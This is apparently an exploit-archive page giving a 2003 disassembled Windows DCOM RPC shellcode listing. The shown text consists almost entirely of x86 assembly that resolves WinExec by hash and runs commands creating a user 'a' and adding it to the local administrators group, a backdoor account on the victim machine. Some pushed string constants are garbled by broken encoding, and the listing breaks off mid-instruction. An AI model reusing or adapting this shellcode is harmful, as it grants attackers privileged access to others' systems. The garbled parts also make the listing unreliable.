[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows (DCOM RPC2) Universal Shellcode
# Published : 2003-10-09
# Author : n/a
# Previous Title : linux/x86 bsd/x86 execve /bin/sh 38 bytes
# Next Title : execve of /bin/sh after setreuid(0,0)
; Segment type: Pure code
;seg000 segment byte public 'CODE' use32
; assume cs:seg000
; assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
.386
assume cs:seg000
var_29C = byte ptr -29Ch
var_28C = byte ptr -28Ch
var_25F = byte ptr -25Fh
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
seg000 segment byte public 'CODE' use32
beginofpackeddata: ; CODE XREF: UnXORFunc+17�j
push ebp
mov ebp, esp
sub esp, 80h
mov esi, esp
call sub_191
push eax
mov eax, fs:18h
mov eax, [eax+30h]
lea eax, [eax+18h]
mov ebx, 190000h
mov [eax], ebx
pop eax
mov [esi], eax
push dword ptr [esi]
push 0E8AFE98h
call GetFunctionBYName ;WinExec
mov [esi+0Ch], eax
push dword ptr [esi]
push 73e2d87eh
call GetFunctionBYName ;ExitProcess
mov [esi+10h], eax
xor eax, eax
push eax
push 'd'
push 'da/ '
push 'a a '
push 'resu'
push ' ten'
mov ecx, esp
push eax
push ecx
call dword ptr [esi+0Ch]
xor eax, eax
push eax
push 'd'
push 'da/ '
push 'a ?'
push 'e?¨°¨¤'
push 'e¨°?¨¨'
push '¨ª¨¨¨¬?'
push '¨¤ pu'
push 'orgl'
push 'acol'
push ' ten'
mov ecx, esp
push eax
push ecx
call dword ptr [esi+0Ch]
xor eax, eax
push eax
push 'd'
push 'da/ '
push 'a ?'
push '¨¤?a '
push '¨¤a¨¢¡§'
push '-¡§?¡è'
push '